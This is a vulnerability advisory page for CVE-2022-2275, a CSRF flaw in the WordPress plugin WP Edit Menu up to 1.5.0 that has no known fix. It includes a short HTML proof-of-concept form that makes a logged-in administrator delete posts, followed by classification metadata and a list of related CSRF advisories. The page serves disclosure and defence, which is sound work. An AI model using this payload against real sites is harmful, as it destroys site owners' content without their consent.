WP Edit Menu <= 1.5.0 – Arbitrary Post Deletion via CSRF | CVE 2022-2275 | Plugin Vulnerabilities

Description

The plugin does not have CSRF in an AJAX action, which could allow attackers to make a logged in admin delete arbitrary posts/pages from the blog via a CSRF attack

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php?action= filter_menu" method="POST">
      <input type="hidden" name="val[]" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Johannes Gangsö

Submitter

Johannes Gangsö

Submitter website

https://profiles.wordpress.org/jgangso/

Submitter twitter

Verified

Yes

WPVDB ID

07757d1e-39ad-4199-bc7a-ecb821dfc996

Timeline

Publicly Published

2022-08-01 (about 1 years ago)

Added

2022-08-01 (about 1 years ago)

Last Updated

2023-05-01 (about 1 years ago)

Other

Published

Title

Published

2024-03-25

Title

NPS computy < 2.7.6 - Results Deletion via CSRF

Published

2023-07-03

Title

Login/Signup Popup < 2.4 - Settings Reset via CSRF

Published

2023-11-23

Title

Simple Testimonials Showcase <= 1.1.5 - Cross-Site Request Forgery

Published

2021-06-30

Title

SEO Wizard <= 4.0.2 - Unauthorised robots.txt & .htaccess Edit via CSRF

Published

2023-04-19

Title

Liquid Speech Balloon < 1.2 - Settings Update via CSRF